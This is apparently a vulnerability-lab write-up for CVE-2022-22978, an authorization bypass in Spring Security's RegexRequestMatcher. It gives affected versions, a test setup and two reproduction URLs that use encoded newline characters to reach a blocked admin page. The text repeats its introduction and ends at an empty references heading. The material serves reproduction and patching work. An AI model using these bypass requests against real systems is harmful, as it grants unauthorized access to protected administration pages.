CVE-2022-22978 Spring Security Authorization Bypass in RegexRequestMatcher

# CVE-2022-22978: Spring Security Authorization Bypass in RegexRequestMatcher In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, RegexRequestMatcher can...

CVE-2022-22978: Spring Security Authorization Bypass in RegexRequestMatcher
===========================================================================

In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers.

Applications using RegexRequestMatcher with `.` in the regular expression are possibly vulnerable to an authorization bypass.

References:

- <https://tanzu.vmware.com/security/cve-2022-22978>
- <https://github.com/DeEpinGh0st/CVE-2022-22978>

Vulnerability Environment
-------------------------

After server is started, browse to <http://your-ip:8080/admin> to see that access to the admin page is blocked.

![](https://shs3.b.qianxin.com/butian_public/f939646f117d9dc3ffea1b02274b56f7777adb70633e0.jpg)

Vulnerability Reproduce
-----------------------

Send the following request to access the admin page:

- [http://your-ip:8080/admin/%0atest](http://your-ip:8080/admin/%0Atest)
- [http://your-ip:8080/admin/%0dtest](http://your-ip:8080/admin/%0Dtest)

![](https://shs3.b.qianxin.com/butian_public/f31004098c3e69a510204940f6fb0679ee08b2278a8d5.jpg)

CVE-2022-22978: Spring Security Authorization Bypass in RegexRequestMatcher

In Spring Security versions 5.5.6 and 5.6.3 and older unsupported versions, RegexRequestMatcher can easily be misconfigured to be bypassed on some servlet containers.

Applications using RegexRequestMatcher with . in the regular expression are possibly vulnerable to an authorization bypass.

References: